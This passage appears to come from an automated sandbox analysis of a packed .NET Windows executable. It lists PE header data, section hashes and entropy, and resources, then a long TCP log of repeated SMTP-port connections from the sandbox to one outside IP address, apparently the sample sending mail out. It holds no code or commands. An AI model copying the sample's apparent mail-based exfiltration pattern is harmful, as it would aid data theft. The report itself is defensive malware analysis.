                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb39380x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x2494.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xb19f00xb1a00604c6518d1a4860fea579e3255c991b7False0.8977860001759325data7.669180420192158IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xb40000x24940x2600154c97070a0d52625c25c19fbaf2269eFalse0.8696546052631579data7.4038875998227045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xb80000xc0x20002b6d9ccb8ce76d8bc8f8ca1e426428fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xb41000x1e7ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9827056110684089
                                          RT_GROUP_ICON0xb5f900x14data1.05
                                          RT_VERSION0xb5fb40x2e0data0.45516304347826086
                                          RT_MANIFEST0xb62a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 9, 2024 07:00:59.149185896 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:00:59.268508911 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:00:59.268635035 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:00.544867039 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:00.551925898 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:00.671343088 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:00.985261917 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:00.985441923 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:01.105426073 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:01.419197083 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:01.452178001 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:01.571641922 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:01.886981964 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:01.887001038 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:01.887012005 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:01.887023926 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:01.887068033 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:01.887089014 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:01.891400099 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:02.010833979 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:02.324815989 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:02.375284910 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:02.380465031 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:02.499771118 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:02.813838005 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:02.827833891 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:02.947120905 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:03.261122942 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:03.273961067 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:03.393318892 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:03.760296106 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:03.765825987 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:03.885130882 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:04.217570066 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:04.217899084 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:04.337270975 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:04.359452009 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:04.478961945 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:04.479047060 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:04.669689894 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:04.670535088 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:04.789860010 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:05.128489017 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:05.129417896 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:05.129417896 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:05.129519939 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:05.129519939 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:05.248691082 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:05.248706102 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:05.248796940 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:05.248815060 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:05.823023081 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:05.823266029 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:05.942706108 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.304347038 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.304600954 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:06.358025074 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.406586885 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:06.408804893 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:06.425188065 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.529252052 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.745522976 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.749536991 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:06.842003107 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.842039108 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.842165947 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:06.846324921 CET49925587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:06.847424984 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:06.868891954 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.965575933 CET5874992577.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.966733932 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:06.966842890 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:07.191848993 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:07.191879034 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:07.191893101 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:07.191957951 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:07.191988945 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:07.192112923 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:07.194308996 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:07.313527107 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:07.635396957 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:07.661354065 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:07.780755997 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:08.102703094 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:08.103230000 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:08.222546101 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:08.332967997 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:08.333102942 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:08.452392101 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:08.546736956 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:08.547250032 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:08.666501045 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:08.777648926 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:08.777887106 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:08.897255898 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.008579969 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.009028912 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:09.128326893 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.222524881 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.226830959 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:09.346205950 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.464632988 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.466548920 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:09.585963011 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.672528982 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.672636986 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.672652960 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.672676086 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:09.672763109 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.672800064 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:09.675403118 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:09.794693947 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.910145998 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:09.910412073 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:10.029762983 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:10.119927883 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:10.121372938 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:10.240556002 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:10.351824999 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:10.352642059 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:10.352727890 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:10.352757931 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:10.352777004 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:10.472023010 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:10.472038031 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:10.472146034 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:10.472155094 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:10.565692902 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:10.566078901 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:10.685372114 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:11.010610104 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:11.010863066 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:11.130202055 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:11.264975071 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:11.312804937 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:11.422331095 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:11.485656023 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:11.486587048 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:11.541613102 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:11.605992079 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:11.863291025 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:11.863547087 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:11.863599062 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:11.946732044 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:11.950824022 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:11.979717970 CET49938587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.070277929 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.099100113 CET5874993877.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.405762911 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.406075001 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.415636063 CET49959587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.525293112 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.534954071 CET5874995977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.535049915 CET49959587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.851819038 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.853568077 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.853568077 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.853640079 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.853715897 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.853785038 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.853785038 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.853785038 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.853873014 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:12.972934961 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.973325968 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.973340034 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.973350048 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.973370075 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.973380089 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.973400116 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.973408937 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:12.973418951 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:13.079065084 CET49959587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:13.170324087 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:13.198679924 CET5874995977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:13.198791981 CET49959587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:13.289727926 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:13.292448044 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:13.892569065 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:13.953432083 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:14.646573067 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:14.646939993 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:14.766246080 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:15.094275951 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:15.098274946 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:15.217984915 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:15.547209024 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:15.550343990 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:15.669666052 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:15.967421055 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:15.998853922 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:15.998930931 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:15.998965979 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:15.999001026 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:15.999003887 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:15.999044895 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:16.001440048 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:16.086841106 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:16.121567965 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:16.412206888 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:16.412286997 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:16.412332058 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:16.412738085 CET49944587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:16.414155006 CET49969587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:16.449615955 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:16.450742006 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:16.532006979 CET5874994477.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:16.533660889 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:16.533730984 CET49969587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:16.570099115 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:16.898099899 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:16.898330927 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:17.017664909 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:17.345484972 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:17.346559048 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:17.465873957 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:17.826167107 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:17.826360941 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:17.865916967 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:17.866041899 CET49969587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:17.945724010 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:17.985368967 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:18.277280092 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:18.277478933 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:18.302608013 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:18.302742958 CET49969587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:18.396823883 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:18.422101021 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:18.727757931 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:18.728039980 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:18.738816023 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:18.739200115 CET49969587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:18.847316980 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:18.858514071 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.175506115 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.175992012 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.176055908 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.176055908 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.176161051 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.177398920 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.177464008 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.177481890 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.177524090 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.177630901 CET49969587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.179131985 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.179244041 CET49969587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.295530081 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.295552969 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.295571089 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.295576096 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.295680046 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.298409939 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.298461914 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.298486948 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.298506975 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.298521996 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.298603058 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.298620939 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.298629999 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.298671007 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.298713923 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.298731089 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.298829079 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.298866034 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.298893929 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.298927069 CET5874996977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.298950911 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.415190935 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.415234089 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.415369034 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.417860031 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.417952061 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.418104887 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.418121099 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.418194056 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.418219090 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.418395996 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.418431997 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.418459892 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.418486118 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.418531895 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.418540955 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.418600082 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.418618917 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.418693066 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.418802023 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.460865974 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.461029053 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.534941912 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.534976006 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.535083055 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.537498951 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.537589073 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.537632942 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.537657022 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.537805080 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.537929058 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.537982941 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.538008928 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.538086891 CET49960587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:01:19.538105965 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.538173914 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.538245916 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.538317919 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.538327932 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.538412094 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.538422108 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.538454056 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.538507938 CET5874996077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:01:19.538608074 CET5874996077.88.21.158192.168.2.9
